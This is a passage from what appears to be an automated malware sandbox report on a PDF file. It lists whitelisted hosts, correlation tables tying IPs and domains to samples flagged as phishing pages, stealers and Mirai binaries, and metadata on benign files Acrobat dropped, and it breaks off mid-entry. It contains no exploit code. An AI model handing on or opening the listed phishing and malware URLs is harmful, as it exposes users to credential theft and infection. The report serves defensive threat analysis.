                                                  • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, SIHClient.exe, SgrmBroker.exe, conhost.exe, svchost.exe
                                                  • Excluded IPs from analysis (whitelisted): 199.232.210.172, 23.218.208.137, 216.58.208.227, 172.217.19.238, 74.125.205.84, 172.64.41.3, 162.159.61.3, 54.224.241.105, 50.16.47.176, 34.237.241.83, 18.213.11.84, 34.104.35.123, 23.195.39.65, 104.122.212.204, 2.16.10.184, 2.16.10.172, 2.20.40.170, 2.22.50.144, 2.22.50.131, 172.217.17.35, 172.217.19.206
                                                  • Excluded domains from analysis (whitelisted): e4578.dscg.akamaiedge.net, chrome.cloudflare-dns.com, e8652.dscx.akamaiedge.net, slscr.update.microsoft.com, e4578.dscb.akamaiedge.net, clientservices.googleapis.com, a767.dspw65.akamai.net, acroipm2.adobe.com, clients2.google.com, ssl-delivery.adobe.com.edgekey.net, a122.dscd.akamai.net, update.googleapis.com, wu-b-net.trafficmanager.net, crl.root-x1.letsencrypt.org.edgekey.net, clients1.google.com, fs.microsoft.com, accounts.google.com, ctldl.windowsupdate.com.delivery.microsoft.com, acroipm2.adobe.com.edgesuite.net, ctldl.windowsupdate.com, p13n.adobe.io, exchange.microsoft.com, fe3cr.delivery.mp.microsoft.com, download.windowsupdate.com.edgesuite.net, ssl.adobe.com.edgekey.net, edgedl.me.gvt1.com, armmf.adobe.com, clients.l.google.com, geo2.adobe.com
                                                  • Not all processes where analyzed, report is missing behavior information
                                                  • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                  • VT rate limit hit for: cgoaudit Files.pdf
                                                  TimeTypeDescription
                                                  09:14:47API Interceptor2x Sleep call for process: AcroCEF.exe modified
                                                  SourceURL
                                                  Screenshothttps://rimpalahore.com/odin/
                                                  Screenshothttps://rimpalahore.com/odin/
                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                  104.18.94.41https://file-data-point.vaultcloudaccess.cfd/pWCDWiGet hashmaliciousUnknownBrowse
                                                    HQV-224647.docxGet hashmaliciousUnknownBrowse
                                                      https://zfrmz.com/mH78Gmbnl9SICcogz2hNGet hashmaliciousHTMLPhisherBrowse
                                                        https://clickproxy.retailrocket.net/?url=https%3A%2F%2Fpaydcosx.z13.web.core.windows.netGet hashmaliciousUnknownBrowse
                                                          HQV-224647.docxGet hashmaliciousHTMLPhisherBrowse
                                                            HQV-224647.docxGet hashmaliciousHTMLPhisherBrowse
                                                              635614_thermofisher.comCQDM.htmlGet hashmaliciousUnknownBrowse
                                                                https://zn.steinbeis-europa.com/FNwysTY/#MGet hashmaliciousUnknownBrowse
                                                                  Garfieldnj Benefit and Pay Increase.pdfGet hashmaliciousUnknownBrowse
                                                                    Demande de proposition du Module Ultra Inc.malz.pdfGet hashmaliciousUnknownBrowse
                                                                      52.6.155.20method-statement-for-valve-installation_compress.pdfGet hashmaliciousUnknownBrowse
                                                                        https://acrobat.adobe.com/id/urn:aaid:sc:EU:98ca4a25-984a-4511-9eb1-b7e6c5c56a12Get hashmaliciousHTMLPhisherBrowse
                                                                          Fw INVOICE TEST-4 - INTUIT QUICKBOOKS - 399.00 USD.zipGet hashmaliciousUnknownBrowse
                                                                            EXTERN Zahlungsbest#U00e4tigung.msgGet hashmaliciousCVE-2024-21412Browse
                                                                              Please_Docusign_this_document_July 2024_2471.pdfGet hashmaliciousUnknownBrowse
                                                                                PO.pdfGet hashmaliciousUnknownBrowse
                                                                                  Absa Eft.pdfGet hashmaliciousHTMLPhisherBrowse
                                                                                    Complete with Docusign andrew.pdfGet hashmaliciousTycoon2FABrowse
                                                                                      http://icloudtw.applelostsupporttw.com/Get hashmaliciousUnknownBrowse
                                                                                        Toconnor-all accumulated bonus.pdfGet hashmaliciousHTMLPhisher, Tycoon2FABrowse
                                                                                          151.101.66.137http://novo.oratoriomariano.com/novo/Get hashmaliciousUnknownBrowse
                                                                                          • code.jquery.com/jquery-3.3.1.min.js
                                                                                          http://facebooksecurity.blogspot.ch/Get hashmaliciousUnknownBrowse
                                                                                          • code.jquery.com/jquery-1.7.min.js
                                                                                          http://site9615380.92.webydo.com/?v=1Get hashmaliciousUnknownBrowse
                                                                                          • code.jquery.com/jquery-1.7.2.min.js
                                                                                          http://grandprairie-water-damage-restoration.comGet hashmaliciousUnknownBrowse
                                                                                          • code.jquery.com/jquery-3.3.1.min.js
                                                                                          2023121142000021ki01kvjs.htmlGet hashmaliciousUnknownBrowse
                                                                                          • code.jquery.com/jquery-latest.min.js
                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                          google.comfile.exeGet hashmaliciousCredential FlusherBrowse
                                                                                          • 142.250.181.46
                                                                                          installer.msi.virus.msiGet hashmaliciousUnknownBrowse
                                                                                          • 142.250.181.100
                                                                                          https://secure-mail.web.magnetonics.com/XYUplc3JPalpuZ2tsL0s3eW1FZTQzVXdBbkRTQlhudjJVMWlZdTlHUW51elRUVG5QOEhlMTg0MXUzb3VXWkJzRGQ2ODlFV0ZMeXBwN0txZ1lRckxxYk9XV1MvcXk2L0EvWHMyY0JKQTFTMytWdmduZ1J6aW1IOWh4eWlER21pOVJwTUhiZFdKMVJBUUhkZmswZS9mVDY0WDVGZFpRLzZTS3VWTlRqaGdqYm1hWG9QaEZWQmJ2d1RYeWxyNjNLVUVvaGtmS2pBZlYwdWtqMGtwWHJXOD0tLUlSL1J5NlA4VnkzaGRLbEYtLU1PTExESEVObm5kbC9kNzBWdS9hWEE9PQ==?cid=2289196598Get hashmaliciousKnowBe4Browse
                                                                                          • 142.250.181.100
                                                                                          file.exeGet hashmaliciousLummaC StealerBrowse
                                                                                          • 142.250.181.100
                                                                                          file.exeGet hashmaliciousCredential FlusherBrowse
                                                                                          • 142.250.181.110
                                                                                          usdt-installer.msi.virus.msiGet hashmaliciousUnknownBrowse
                                                                                          • 142.250.181.100
                                                                                          file.exeGet hashmaliciousCredential FlusherBrowse
                                                                                          • 142.250.181.46
                                                                                          file.exeGet hashmaliciousCredential FlusherBrowse
                                                                                          • 142.250.181.78
                                                                                          http://security-microsoft.netGet hashmaliciousUnknownBrowse
                                                                                          • 142.250.181.100
                                                                                          file.exeGet hashmaliciousCredential FlusherBrowse
                                                                                          • 172.217.19.174
                                                                                          bg.microsoft.map.fastly.netusdt-set.msi.virus.msiGet hashmaliciousRMSRemoteAdmin, Remote UtilitiesBrowse
                                                                                          • 199.232.210.172
                                                                                          Felix Paulpaymentsummary.pdfGet hashmaliciousUnknownBrowse
                                                                                          • 199.232.210.172
                                                                                          SERV27THNOVSCANNEDcopiesACCOUNT-SUMMARYcon3-2.vbsGet hashmaliciousGuLoader, RemcosBrowse
                                                                                          • 199.232.210.172
                                                                                          https://u48346967.ct.sendgrid.net/ls/click?upn=u001.A0zc-2BEvyk1Wl-2FMpdhEZeKOri2-2FGgH2RTzsX65VEcnN5SaLyl0UT8OMFIJrPp3PpoUM6xY28FQ2N7ftppG5RudDteJXD3BQZCthiPi2c2ALFGlSPfhe-2FcxhcglgWUQb-2BQESuvSP1z-2Bm6yiScj3t94MRtf0LYKB9CrrSBugAIE2LYG8LmYpSkH60B-2FMZ3-2BrvjbSA4-2FMKq-2BcyWHr8EPqNcLYpXKIa0eXlisYAn-2BUQ7zduW7tl-2BbLdZxK7-2F64kDFJWjAhA5-2BQkfVJJJox5IXYuhbutR70TtJJBVXs1-2BGpCmHbl-2BDNTOjQhDGBdV0GcWgnTqzbjbnvsgf-2Be0TXvdX5Smk9Cf3e70Q9X7CCHEUK7n5Iz83JVMEOM-2Fand-2B23jD1RrWlwwdn356TAiWPO93YBbqf0SO77Y7wdjJ1b9FY9HkvpCMIajIk8oGDIkalcOsvDrkfpAsNhyAACh29yO16Fg-2FM5u3K-2FXbE9Ex7FVSxGjaaC9sm3ZFKCHARATSNuZ5Fje0JCvs-2FuHNf8MhNMkgfl0FBuxcFtouETvn8R0InFl5AtNwGS6Afu60jlKV5PLEF8GeumMl4Zuoh2K-2F2yPQclKc1crfKqXCOnUQUzOQ7UyIpV0r3b47s6ht1AVAEPjV3zoZw9RLpCyXdGkoI8n06eY007Qg9WwLvy7We-2BQcl-2FyYQ4K5CNcUfW8-2FQg9WDKExl17JZaFzhxAoq-2BwaUF-2FPSBbiheA-3D-3DBAmv_E3L6leNeSrsKdZRYtQjjvk8ZOa9A4bij2szZYlv-2FSjOyY2LntaIC9lc5AczVcItTKnTcAjLh0HEKnQNZyflE6D2HGcG26apaw7n2tC5VqvM2UcyzBBD1DmxfzE65759Zy2dJ8uKlh1aNRsyyyValZVTQcn3ni8Tm37DTh6WIc4MT5VT1z00HjpalKg-2FQrTWnFM0TODjZIrdPJoM-2FoAmEFGrVd3uzIi3Vm8WvNhqpICV52tAOwklitsI6ByucFBK-2BsrlwW-2FgoU27tpCzl3fnC5JTGLjtXLO9-2Bt5r0CYbrzB-2F0xJTEBuotaeZo6qxxL9cN-2FKBosiyqzpNH4Cne4lQAddsD-2FvJ0Im58HqPGOFTb8tDl6aWuSsL5FV7fR9m21jrZj6xA7xxwEw5vP2Nt9Lx-2Bme93lRMZkKLJTCm99brmPaqLiTfi3DxTe5oDBG0ABTPRcVak0527Q3qf5glAqALvLyUiHSqoHc-2FJNqek4r-2Bs-2Fwfxt-2BA4QX2uvYnIPHMWT1RYGd7IroaLDO1RX4MK6eaI1uJdhAEd3lhuoAFNeNiHC-2Btw63U82mukiSpX-2Bnt78RIS96K1hvN-2Foz75ylnzTx4GmLQYzrBep-2BOAgnFdhntVeyrWfFa0zVVEJiFU-2B4Kfw5TLRnbIsKobsRK0ccx4QN-2BAkLz9Rzb3z0yKFOSnlqtyA9G5Tz17Y8pL7d1O-2B27quYdAee3zh3g58o9-2BL03HRB8q3gVGJSBn2rE3QoChAnGf2N160-2BA80ZvI-2B-2BRJc5AuT-2BsalKvHdXJkJsxx4unFklKkuU5SiXjV185lbD9n8dsB20wicgj1k-2Bx7TXmuc2xuGqaWoejVggyHxHBRazdsLCgmn4rbKYq0oV6n3lfh5PyUXEE-3DGet hashmaliciousUnknownBrowse
                                                                                          • 199.232.210.172
                                                                                          awb_shipping_post_27112024224782020031808174CN27112024000001124.vbsGet hashmaliciousGuLoader, RemcosBrowse
                                                                                          • 199.232.214.172
                                                                                          method-statement-for-valve-installation_compress.pdfGet hashmaliciousUnknownBrowse
                                                                                          • 199.232.210.172
                                                                                          DOCUMENTS, COI - Trilogy Investment Company.emlGet hashmaliciousCredentialStealerBrowse
                                                                                          • 199.232.214.172
                                                                                          file.exeGet hashmaliciousAmadey, Stealc, VidarBrowse
                                                                                          • 199.232.210.172
                                                                                          Demande de proposition du Allesi Telecom.pdfGet hashmaliciousUnknownBrowse
                                                                                          • 199.232.210.172
                                                                                          Driving a supply chain planning evaluation.emlGet hashmaliciousLure-BasedAttackBrowse
                                                                                          • 199.232.210.172
                                                                                          code.jquery.comtmpE43E.htmGet hashmaliciousUnknownBrowse
                                                                                          • 151.101.2.137
                                                                                          https://zfrmz.com/mH78Gmbnl9SICcogz2hNGet hashmaliciousHTMLPhisherBrowse
                                                                                          • 151.101.66.137
                                                                                          https://clickproxy.retailrocket.net/?url=https%3A%2F%2Fpaydcosx.z13.web.core.windows.netGet hashmaliciousUnknownBrowse
                                                                                          • 151.101.66.137
                                                                                          https://link.edgepilot.com/s/3b095c08/ZyRgSnzc50mRg_8d-46dUQ?u=https://kingdompch.com/Get hashmaliciousUnknownBrowse
                                                                                          • 151.101.2.137
                                                                                          https://link.mail.beehiiv.com/ls/click?upn=u001.KDDa4SKH91gcnCIm13FUDjBk8DnozwkSdxe-2BLMCJAa8TiKDhd-2B38pl782PnlKrmgzQTjD8fATdnwc5QgneqdUjWYx5D82QC2JajKOD5dhwQf6nBS9x6PxACdxqZ-2BVvfXSFr536dEl71Z4-2B0lKXrlBq2I7OGOUfe9d0qU6CGc-2Fmfk3q0WwhO42BOQi8aYKh6VoV-2Fvh8sTRNP-2FzICpX0YMfHxlEW7fbg9SV-2BZbNdkv2-2Fpl72tpteDYdTlwajVUY00F0PHA_ZF37BJsSpeg2ggKro0Kw1JZi2Q7X5lMR4GcQUR-2F5GPPdktqhJXeC-2Bsy71uIylML6XXkLS1FYaxFM495ZF5HfT0kw37Vy5JEgIau55HagsDPP2WniEKQdRVUyQJDaH4w-2F2p6KuwGHUKUEB38nhc92t8hXLjbu-2FxKQqxpAf-2FIB1EdEcuDPVgMcwWoZKV6-2FqV3HrDnxqjceVv4CXxtjZ2JkO-2FUQ9O68DpCM-2F5dMvT-2FayKu2U6pF5JC6uPW18Z2ptqBTGPNdoimmFZuTI-2BzLIJuacRYcsFhvk-2FwCd5-2FfgR9VaRTivmwUCmaQtKoAP0BOnzwqcmyDGFhpcYOdxVqyJWSy-2B743S17rkeGe7waWwJLboNXwyMd-2B9s8I3MOfBk2TtelNM0qBGTIKvZZMmOPaGvvxbvCz8i7Yz-2FsuCfpo46vACb3GxE1l0-2FAMv8NYCoN3rK-2BbGet hashmaliciousUnknownBrowse
                                                                                          • 151.101.2.137
                                                                                          Invoice_Billing_highwoodmgmt.com_9122716363.htmlGet hashmaliciousUnknownBrowse
                                                                                          • 151.101.66.137
                                                                                          https://zn.steinbeis-europa.com/FNwysTY/#MGet hashmaliciousUnknownBrowse
                                                                                          • 151.101.2.137
                                                                                          Garfieldnj Benefit and Pay Increase.pdfGet hashmaliciousUnknownBrowse
                                                                                          • 151.101.66.137
                                                                                          https://clickme.thryv.com/ls/click?upn=u001.5dsdCa4YiGVzoib36gWoSGsyoMtOK8NC-2BgKkKyRh9BKUE5Wd74HNsIyVLn2PJ7mQ4318GCCtBbQ9QnsDoKKXzQ-3D-3DC0fe_Uxfyb-2FV90WCSGuHCd77YDe2QH-2FfxD2e5Op8ULStuWwSYUM08QLuqWk0rbdQO8p2GP5XR1Nwn9dFZi5DaOMyz92mdTvaHywQzrJIxcHTOEjq504Zy7B58qY1udBLScwt3fnzf7-2Bd2dRX-2FrpgJW7h9tbPQoetNbvxlK-2FEVY6hzlIaccR9cV7sH6EkiVysDfZ2luyv-2Fv7TqmF5GSxjZLpAACxKbVqPF1kpcKXqw97JFr2agPCQj4DHAzJML2VBkA2tqhZ9WO-2FKehhQq4JNfrvYgRy56MOKt6ej5KI3BgA6H60e9zK9gPHh8aixxXkpfGiwHQhCvbO5qMmTUWkH-2BhKNgBg-3D-3DGet hashmaliciousHTMLPhisherBrowse
                                                                                          • 151.101.66.137
                                                                                          https://multikultural.az/web/v2/index.php?query=ZW1ja2VubmFAY2hzaS5vcmc=Get hashmaliciousUnknownBrowse
                                                                                          • 151.101.2.137
                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                          AMAZON-AESUShttps://secure-mail.web.magnetonics.com/XYUplc3JPalpuZ2tsL0s3eW1FZTQzVXdBbkRTQlhudjJVMWlZdTlHUW51elRUVG5QOEhlMTg0MXUzb3VXWkJzRGQ2ODlFV0ZMeXBwN0txZ1lRckxxYk9XV1MvcXk2L0EvWHMyY0JKQTFTMytWdmduZ1J6aW1IOWh4eWlER21pOVJwTUhiZFdKMVJBUUhkZmswZS9mVDY0WDVGZFpRLzZTS3VWTlRqaGdqYm1hWG9QaEZWQmJ2d1RYeWxyNjNLVUVvaGtmS2pBZlYwdWtqMGtwWHJXOD0tLUlSL1J5NlA4VnkzaGRLbEYtLU1PTExESEVObm5kbC9kNzBWdS9hWEE9PQ==?cid=2289196598Get hashmaliciousKnowBe4Browse
                                                                                          • 3.210.252.138
                                                                                          file.exeGet hashmaliciousAmadey, Credential Flusher, Cryptbot, LummaC Stealer, Stealc, VidarBrowse
                                                                                          • 18.213.123.165
                                                                                          https://getgreenshot.orgGet hashmaliciousUnknownBrowse
                                                                                          • 44.216.196.47
                                                                                          file.exeGet hashmaliciousClipboard Hijacker, CryptbotBrowse
                                                                                          • 18.213.123.165
                                                                                          tmpE43E.htmGet hashmaliciousUnknownBrowse
                                                                                          • 54.197.177.132
                                                                                          eInvoice.htmlGet hashmaliciousHTMLPhisherBrowse
                                                                                          • 18.209.137.201
                                                                                          sh4.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                                                                          • 184.73.204.117
                                                                                          arm7.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                                                                          • 54.129.167.137
                                                                                          arm5.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                                                                          • 54.159.154.90
                                                                                          file.exeGet hashmaliciousClipboard Hijacker, CryptbotBrowse
                                                                                          • 18.208.8.205
                                                                                          CLOUDFLARENETUSOrder 630195847002.exeGet hashmaliciousPureLog Stealer, Snake KeyloggerBrowse
                                                                                          • 172.67.177.134
                                                                                          file.exeGet hashmaliciousLummaC StealerBrowse
                                                                                          • 104.21.82.174
                                                                                          file.exeGet hashmaliciousUnknownBrowse
                                                                                          • 104.21.82.174
                                                                                          file.exeGet hashmaliciousAmadey, Credential Flusher, Cryptbot, LummaC Stealer, Stealc, VidarBrowse
                                                                                          • 172.67.160.80
                                                                                          https://file-data-point.vaultcloudaccess.cfd/pWCDWiGet hashmaliciousUnknownBrowse
                                                                                          • 104.16.123.96
                                                                                          https://getgreenshot.orgGet hashmaliciousUnknownBrowse
                                                                                          • 172.67.164.214
                                                                                          file.exeGet hashmaliciousLummaC StealerBrowse
                                                                                          • 172.67.160.80
                                                                                          https://www.anrdoezrs.net/links/7179331/type/dlg/https:/online.complexes1.click/modifications.html?pack=ZXhhbXBsZUBlbWFpbC5jb20=Get hashmaliciousUnknownBrowse
                                                                                          • 172.67.187.109
                                                                                          RMHdBSlo.emlGet hashmaliciousCredentialStealerBrowse
                                                                                          • 104.17.25.14
                                                                                          https://citiscapegroupae-my.sharepoint.com/:li:/g/personal/asekhar_citiscapegroup_com/E9U24ACMrctKoLKfReMWVjMBfxodtw3c4oUIHo4oyReVhg?e=SgIv5D&xsdata=MDV8MDJ8ZGVyZWsuZGVscG9ydEBvbnRoZWRvdC5jby56YXw5ZWEzNzFkNDdmNTM0YzE2Yjg5YTA4ZGQwZTAwZjY1OXwxMGRjN2M5NjU5NzY0NjAxODgyYzlhYzdjMjg3MGVjY3wxfDB8NjM4NjgyMTE5NTE1MDk3NDExfFVua25vd258VFdGcGJHWnNiM2Q4ZXlKRmJYQjBlVTFoY0draU9uUnlkV1VzSWxZaU9pSXdMakF1TURBd01DSXNJbEFpT2lKWGFXNHpNaUlzSWtGT0lqb2lUV0ZwYkNJc0lsZFVJam95ZlE9PXwwfHx8&sdata=S3JqYzUxeUd4SmtWMEVWUzBMU3JUREpWTEJiN3VmeFVrY09ucElOZDRzaz0%3dGet hashmaliciousHTMLPhisherBrowse
                                                                                          • 104.18.24.163
                                                                                          FASTLYUSfile.exeGet hashmaliciousCredential FlusherBrowse
                                                                                          • 151.101.65.91
                                                                                          file.exeGet hashmaliciousCredential FlusherBrowse
                                                                                          • 151.101.129.91
                                                                                          file.exeGet hashmaliciousCredential FlusherBrowse
                                                                                          • 151.101.129.91
                                                                                          file.exeGet hashmaliciousCredential FlusherBrowse
                                                                                          • 151.101.1.91
                                                                                          file.exeGet hashmaliciousCredential FlusherBrowse
                                                                                          • 151.101.193.91
                                                                                          https://getgreenshot.orgGet hashmaliciousUnknownBrowse
                                                                                          • 151.101.1.21
                                                                                          file.exeGet hashmaliciousCredential FlusherBrowse
                                                                                          • 151.101.129.91
                                                                                          file.exeGet hashmaliciousCredential FlusherBrowse
                                                                                          • 151.101.193.91
                                                                                          file.exeGet hashmaliciousCredential FlusherBrowse
                                                                                          • 151.101.65.91
                                                                                          tmpE43E.htmGet hashmaliciousUnknownBrowse
                                                                                          • 151.101.2.137
                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                          28a2c9bd18a11de089ef85a160da29e4https://secure-mail.web.magnetonics.com/XYUplc3JPalpuZ2tsL0s3eW1FZTQzVXdBbkRTQlhudjJVMWlZdTlHUW51elRUVG5QOEhlMTg0MXUzb3VXWkJzRGQ2ODlFV0ZMeXBwN0txZ1lRckxxYk9XV1MvcXk2L0EvWHMyY0JKQTFTMytWdmduZ1J6aW1IOWh4eWlER21pOVJwTUhiZFdKMVJBUUhkZmswZS9mVDY0WDVGZFpRLzZTS3VWTlRqaGdqYm1hWG9QaEZWQmJ2d1RYeWxyNjNLVUVvaGtmS2pBZlYwdWtqMGtwWHJXOD0tLUlSL1J5NlA4VnkzaGRLbEYtLU1PTExESEVObm5kbC9kNzBWdS9hWEE9PQ==?cid=2289196598Get hashmaliciousKnowBe4Browse
                                                                                          • 52.149.20.212
                                                                                          • 23.218.208.109
                                                                                          file.exeGet hashmaliciousLummaC StealerBrowse
                                                                                          • 52.149.20.212
                                                                                          • 23.218.208.109
                                                                                          http://security-microsoft.netGet hashmaliciousUnknownBrowse
                                                                                          • 52.149.20.212
                                                                                          • 23.218.208.109
                                                                                          file.exeGet hashmaliciousAmadey, Credential Flusher, Cryptbot, LummaC Stealer, Stealc, VidarBrowse
                                                                                          • 52.149.20.212
                                                                                          • 23.218.208.109
                                                                                          https://file-data-point.vaultcloudaccess.cfd/pWCDWiGet hashmaliciousUnknownBrowse
                                                                                          • 52.149.20.212
                                                                                          • 23.218.208.109
                                                                                          https://getgreenshot.orgGet hashmaliciousUnknownBrowse
                                                                                          • 52.149.20.212
                                                                                          • 23.218.208.109
                                                                                          file.exeGet hashmaliciousLummaC StealerBrowse
                                                                                          • 52.149.20.212
                                                                                          • 23.218.208.109
                                                                                          https://www.anrdoezrs.net/links/7179331/type/dlg/https:/online.complexes1.click/modifications.html?pack=ZXhhbXBsZUBlbWFpbC5jb20=Get hashmaliciousUnknownBrowse
                                                                                          • 52.149.20.212
                                                                                          • 23.218.208.109
                                                                                          RMHdBSlo.emlGet hashmaliciousCredentialStealerBrowse
                                                                                          • 52.149.20.212
                                                                                          • 23.218.208.109
                                                                                          http://kde-ltddocument9.technolutionszzzz.netGet hashmaliciousUnknownBrowse
                                                                                          • 52.149.20.212
                                                                                          • 23.218.208.109
                                                                                          No context
                                                                                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                          File Type:ASCII text
                                                                                          Category:dropped
                                                                                          Size (bytes):290
                                                                                          Entropy (8bit):5.1980339774110895
                                                                                          Encrypted:false
                                                                                          SSDEEP:6:HCvT5yq2PRN2nKuAl9OmbnIFUt8YCvTdr1Zmw+YCvTd9RkwORN2nKuAl9OmbjLJ:Y8vaHAahFUt85dr1/+5d75JHAaSJ
                                                                                          MD5:28EDC220E102E75ED11656CA4D5D13BE
                                                                                          SHA1:9E9571402B8BFF3EF5939FDC7FE7FDD1FB710A4A
                                                                                          SHA-256:1471991F00889F16A6BFC7723CD4B910BFCE640FADD703C22404FE80702B09BE
                                                                                          SHA-512:21D23E6B6CBB7E4C928EF8FCA4A5481574D4066EB0FE76619E9BC34449FF1811F63C8B42E236170A1BEF244BD6F188AAA42F4F1B37C8B447B6C043C3C5FABA64
                                                                                          Malicious:false
                                                                                          Reputation:low
                                                                                          Preview:2024/11/27-09:14:36.430 1990 Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache/MANIFEST-000001.2024/11/27-09:14:36.432 1990 Recovering log #3.2024/11/27-09:14:36.432 1990 Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache/000003.log .
                                                                                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                          File Type:ASCII text
                                                                                          Category:dropped
                                                                                          Size (bytes):290
                                                                                          Entropy (8bit):5.1980339774110895
                                                                                          Encrypted:false
                                                                                          SSDEEP:6:HCvT5yq2PRN2nKuAl9OmbnIFUt8YCvTdr1Zmw+YCvTd9RkwORN2nKuAl9OmbjLJ:Y8vaHAahFUt85dr1/+5d75JHAaSJ
                                                                                          MD5:28EDC220E102E75ED11656CA4D5D13BE
                                                                                          SHA1:9E9571402B8BFF3EF5939FDC7FE7FDD1FB710A4A
                                                                                          SHA-256:1471991F00889F16A6BFC7723CD4B910BFCE640FADD703C22404FE80702B09BE
                                                                                          SHA-512:21D23E6B6CBB7E4C928EF8FCA4A5481574D4066EB0FE76619E9BC34449FF1811F63C8B42E236170A1BEF244BD6F188AAA42F4F1B37C8B447B6C043C3C5FABA64
                                                                                          Malicious:false
                                                                                          Reputation:low
                                                                                          Preview:2024/11/27-09:14:36.430 1990 Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache/MANIFEST-000001.2024/11/27-09:14:36.432 1990 Recovering log #3.2024/11/27-09:14:36.432 1990 Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache/000003.log .
                                                                                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                          File Type:ASCII text
                                                                                          Category:dropped
                                                                                          Size (bytes):334
                                                                                          Entropy (8bit):5.199678700484853
                                                                                          Encrypted:false
                                                                                          SSDEEP:6:HCvTVN+q2PRN2nKuAl9Ombzo2jMGIFUt8YCvTdUZmw+YCvTJtVkwORN2nKuAl9OU:YVIvaHAa8uFUt85dU/+5JT5JHAa8RJ
                                                                                          MD5:881E8B27DDD608BAF2C6683D9DD62B09
                                                                                          SHA1:4A4CE4CF1BF9F5F3D963C366E51D477E1DA7D7E8
                                                                                          SHA-256:1B4CC7EF3AED78C3503A59D6E0FF5DECE8E13B659C9E37FE01BAD4A22D60F3D6
                                                                                          SHA-512:450286FBC387F637BD834AFF9B92F75CFCD940B99E4BF2E6387ADD2E2E3C50377EBF22D207B01EF46EEEECB12C0557501614CB9822206291A3528CE3156C3AAF
                                                                                          Malicious:false
                                                                                          Reputation:low
                                                                                          Preview:2024/11/27-09:14:36.274 1a18 Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb/MANIFEST-000001.2024/11/27-09:14:36.277 1a18 Recovering log #3.2024/11/27-09:14:36.278 1a18 Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb/000003.log .
                                                                                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                          File Type:ASCII text
                                                                                          Category:dropped
                                                                                          Size (bytes):334
                                                                                          Entropy (8bit):5.199678700484853
                                                                                          Encrypted:false
                                                                                          SSDEEP:6:HCvTVN+q2PRN2nKuAl9Ombzo2jMGIFUt8YCvTdUZmw+YCvTJtVkwORN2nKuAl9OU:YVIvaHAa8uFUt85dU/+5JT5JHAa8RJ
                                                                                          MD5:881E8B27DDD608BAF2C6683D9DD62B09
                                                                                          SHA1:4A4CE4CF1BF9F5F3D963C366E51D477E1DA7D7E8
                                                                                          SHA-256:1B4CC7EF3AED78C3503A59D6E0FF5DECE8E13B659C9E37FE01BAD4A22D60F3D6
                                                                                          SHA-512:450286FBC387F637BD834AFF9B92F75CFCD940B99E4BF2E6387ADD2E2E3C50377EBF22D207B01EF46EEEECB12C0557501614CB9822206291A3528CE3156C3AAF
                                                                                          Malicious:false
                                                                                          Reputation:low
                                                                                          Preview:2024/11/27-09:14:36.274 1a18 Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb/MANIFEST-000001.2024/11/27-09:14:36.277 1a18 Recovering log #3.2024/11/27-09:14:36.278 1a18 Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb/000003.log .
                                                                                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                          File Type:JSON data
                                                                                          Category:modified
                                                                                          Size (bytes):403
                                                                                          Entropy (8bit):4.995802934352705
                                                                                          Encrypted:false
                                                                                          SSDEEP:6:YHpoNXR8+eqq59SVsDHF4R8HOVWj2HEMAa9a1o3/QBR7Y53h6ubU74MS7PMVKJTn:YHO8sq2VsBdOg2HOcaq3QYiubrP7E4TX
                                                                                          MD5:4906DB3A9A47B03AC564D821BC96BE89
                                                                                          SHA1:3437861AC8CF778825FC558D30EE1B1D7150B087
                                                                                          SHA-256:A297D5B9FBF801C291113F5F4DC61FEB89EE7930C8F0AF9ED79FB6C1C81AF45D
                                                                                          SHA-512:DE6C2D2DBAFC5D78180692DA0E106A963D0A5AFE6A6EB524C04D39FE9DE724D0043F7A5144CFE8225B03E8C369B17176B7B178DD05D026F1A0E5A01CB2B89BE2
                                                                                          Malicious:false
                                                                                          Reputation:low
                                                                                          Preview:{"net":{"http_server_properties":{"servers":[{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13377276884537085","port":443,"protocol_str":"quic"}],"isolation":[],"network_stats":{"srtt":790349},"server":"https://chrome.cloudflare-dns.com","supports_spdy":true}],"supports_quic":{"address":"192.168.2.16","used_quic":true},"version":5},"network_qualities":{"CAESABiAgICA+P////8B":"3G"}}}
                                                                                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                          File Type:JSON data
                                                                                          Category:dropped
                                                                                          Size (bytes):403
                                                                                          Entropy (8bit):4.995802934352705
                                                                                          Encrypted:false
                                                                                          SSDEEP:6:YHpoNXR8+eqq59SVsDHF4R8HOVWj2HEMAa9a1o3/QBR7Y53h6ubU74MS7PMVKJTn:YHO8sq2VsBdOg2HOcaq3QYiubrP7E4TX
                                                                                          MD5:4906DB3A9A47B03AC564D821BC96BE89
                                                                                          SHA1:3437861AC8CF778825FC558D30EE1B1D7150B087
